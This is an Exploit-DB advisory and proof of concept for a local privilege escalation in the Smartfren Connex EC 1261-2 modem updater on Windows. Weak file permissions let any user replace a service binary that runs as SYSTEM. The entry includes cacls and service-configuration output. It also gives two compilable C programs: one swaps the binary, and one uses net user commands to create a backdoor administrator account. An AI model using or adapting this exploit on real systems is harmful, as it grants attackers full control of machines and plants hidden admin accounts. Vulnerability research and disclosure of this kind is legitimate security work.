Smartfren Connex EC 1261-2 UI OUC - Local Privilege Escalation

EDB-ID:

21547

CVE:



Author:

X-Cisadane

Type:

local


Platform:

Windows

Date:

2012-09-27


========================================================================== 
Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability 
==========================================================================

:-------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability 
: # Date : 26 September 2012 
: # Author : X-Cisadane 
: # Software Link : http://www.smartfren.com/data/ec1261.html  
: # File Version : 21.005.15.03.836  
: # Category : Desktop (Windows) Applications 
: # Platform : Win32 & Win64 
: # Vulnerability : Local Privilege Escalation Vulnerability 
: # Tested On : Microsoft Windows 7 Ultimate 64 Bit (EN) 
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabarcyber, Winda utari
:-------------------------------------------------------------------------------------------------------------------------------------:
Summary
========
Smartfren Connex EC 1261-2 UI OUC is part of Smartfren Connex EC USB EVDO Modem files. 
Smartfren Connex EC 1261-2 UI OUC is a daemon for updating the USB EVDO Modem files of Smartfren Connex.

Description
===========
Improper file permissions on executable file of the application could result on Local Privilege Escalation Vulnerability.
It can be used by a simple user that can change the executable file with a binary of choice. 
The binary (ouc.exe) is set by default to Startup and will be executed with SYSTEM privileges. 
Tested on : Microsoft Windows 7 Ultimate 64 Bit (EN).

Proof of Concept
================
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>>cacls ouc.exe
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe 	Everyone:F 
 									BUILTIN\Users:F
                                                                      	NT AUTHORITY\SYSTEM:(ID)F
                                                                      	BUILTIN\Administrators:(ID)F

C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>sc qc "Smartfren Connex EC1261-2 UI. RunOuc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Smartfren Connex EC1261-2 UI. OUC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

----------------------------------------------------------------------------------------------
The following attack scenario could be used :
1. An attacker (unprivileged user) rename Smartfren Connex EC1261-2 UI. OUC program file. 
For example, the Smartfren Connex EC1261-2 UI. OUC program file could be :
For Win32 ---> X:\Program Files\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager) 
For Win64 ---> X:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
Rename the file to ouc.exe.old
2. An attacker copies his malicious executable file (with same name as the old filename of the FILE - ouc.exe) in the same location.
3. Restart the system.
After restart attackers malicious file will be executed with SYSTEM privileges.

You can also do it with these simple program :
------------------------------------- [ CUT HERE ] -------------------------------------------
Compile these script below with Dev-C++
Save in the C:\sploit.cpp

#include <stdio.h>
#include <windows.h>
#define DEFAULT_TARGET  "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe"
#define DEFAULT_BACKUP  "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe.old"
#define DEFAULT_EXECUTE "C:\\bin.exe"
int main(int argc, char *argv[])
{

     MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);
     CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);
     return 0;
}
 

Compile these script below with Dev-C++
Save in the C:\bin.cpp

#include <stdio.h>
#include <windows.h>
#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
#define ONE "/C net user xcisadane xcisadane /add"
#define TWO "/C net localgroup administrators xcisadane /add"
int main(int argc, char *argv[])
{
STARTUPINFO si = {sizeof(STARTUPINFO)};
PROCESS_INFORMATION pi;
     CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
     CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
     return 0;
}
------------------------------------- [ CUT HERE ] -------------------------------------------
Execute file sploit.exe that located in C:\
Reboot your Windows. After reboot, let's check Net User from Command Prompt, if there an user with name xcisadane, so you have successfully!
P.S : For Win32 please change Program Files (x86) to Program Files.